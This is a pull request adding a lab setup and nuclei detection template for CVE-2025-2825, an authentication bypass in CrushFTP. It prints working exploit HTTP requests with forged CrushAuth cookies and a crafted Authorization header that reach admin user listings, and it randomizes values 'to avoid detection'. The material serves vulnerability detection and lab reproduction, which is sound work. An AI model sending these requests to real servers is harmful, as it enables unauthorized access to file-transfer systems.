### PR TITLE
CVE-2025-2825: CrushFTP Authentication Bypass

### DIFF
--- a/http/cves/2025/CVE-2025-2825/README.md
+++ b/http/cves/2025/CVE-2025-2825/README.md
@@ -1,0 +1,122 @@
+# CVE-2025-2825: CrushFTP Authentication Bypass
+
+## Description:
+CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0 are affected by a vulnerability that may result in unauthenticated access. Remote and unauthenticated HTTP requests to CrushFTP may allow attackers to gain unauthorized access.
+
+
+## Reference:
+- https://nvd.nist.gov/vuln/detail/CVE-2025-2825
+- https://projectdiscovery.io/blog/crushftp-authentication-bypass/
+- https://www.crushftp.com/crush11wiki/Wiki.jsp?page=Update
+
+
+## Vulnerable Setup:
+
+- Execute the following commands to start a CrushFTP 11.3.0 server:
+
+```
+docker compose up -d
+```
+
+- After the server is started, browse to http://localhost:8001/WebInterface/login.html to see the CrushFTP WebInterface Login Panel
+
+## Exploitation Steps:
+
+The authentication bypass can be triggered by sending specially crafted requests with manipulated authentication tokens.
+
+
+HTTP Request
+
+
+```
+GET /WebInterface/function/?command=getUserInfo&c2f=9606 HTTP/1.1
+Host: locahost:8081
+User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Connection: close
+Accept-Encoding: gzip
+Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/
+Cookie: CrushAuth=1049161285377_jZiGxXHpBrrLsAEJmBfAaiFsImLZ9606; currentAuth=9606
+Origin: http://localhost:8081
+Referer: http://localhost:8081/WebInterface/login.html
+X-Requested-With: XMLHttpRequest
+
+
+```
+
+
+![image](https://github.com/user-attachments/assets/4aed5bed-2227-4998-831b-307ad8a5e4b8)
+
+# Steps to Write Nuclei Template
+
+
+Define Variables
+
+- To randomize requests and avoid detection, define variables:
+
+```
+variables:
+  string_1: "{{rand_text_numeric(13)}}"
+  string_2: "{{rand_text_alpha(28)}}"
+  string_3: "{{rand_text_numeric(4)}}"
+```
+
+Create HTTP Requests
+
+- The authentication bypass occurs by manipulating CrushAuth cookies and sending unauthorized requests. Craft raw HTTP requests:
+
+```
+http:
+  - raw:
+      - |
+        GET /WebInterface/function/?command=getUserList&serverGroup=MainUsers&c2f={{string_3}} HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: CrushAuth={{string_1}}_{{string_2}}{{string_3}}; currentAuth={{string_3}}
+        Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/
+        Origin: {{RootURL}}
+        Referer: {{RootURL}}/WebInterface/login.html
+        X-Requested-With: XMLHttpRequest
+        Accept-Encoding: gzip
+
+
+```
+
+Matchers Definition
+
+- To confirm successful exploitation, the response must meet the following conditions:
+
+1️⃣ Status Code
+The server should return HTTP 200 (OK), indicating a successful request.
+
+2️⃣ Response Body
+The response should contain the username "crushadmin" inside the <user_list_subitem> tag, confirming user enumeration.
+
+3️⃣ Content-Type
+The response should be in XML format (text/xml).
+
+
+```
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<user_list_subitem>crushadmin</user_list_subitem>"
+
+      - type: word
+        part: content_type
+        words:
+          - "text/xml"
+
+      - type: status
+        status:
+          - 200
+```
+
+## Nuclei Template URL : [CVE-2025-2825](https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-2825.yaml)
+
+## Nuclei Command :
+
+```bash
+nuclei -t CVE-2025-2825.yaml -u http://localhost:8001 -vv
+```

--- a/http/cves/2025/CVE-2025-2825/docker-compose.yml
+++ b/http/cves/2025/CVE-2025-2825/docker-compose.yml
@@ -1,0 +1,21 @@
+version: '3.4'
+services:
+  crushftp:
+    user: "${UID}:${GID}"
+    image: 'crushftp/crushftp11:11.3.0_0'
+    container_name: crushftp
+    ports:
+      - '8081:8080'
+      - '9091:9090'
+      - '8443:443'
+    environment:
+      CRUSHFTP_ADMIN_PASSWORD: "changeme"
+    volumes:
+    - ./CrushFTP11/:/app/CrushFTP11:rw
+volumes:
+  CrushFTP11:
+    driver: local
+    driver_opts:
+      type: none
+      o: bind
+      device: ${PWD}


### PR DESCRIPTION

```
nuclei -u http://localhost:8081 -t CVE-2025-2825.yaml -vv

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.1

		projectdiscovery.io

[INF] Current nuclei version: v3.4.1 (latest)
[INF] Current nuclei-templates version: v10.1.5 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 281
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2025-2825] CrushFTP Authentication Bypass (@parthmalhotra,@ice3man,@dhiyaneshdk,@pdresearch) [critical]
[CVE-2025-2825] [http] [critical] http://localhost:8081/WebInterface/function/?command=getUserList&serverGroup=MainUsers&c2f=8621
```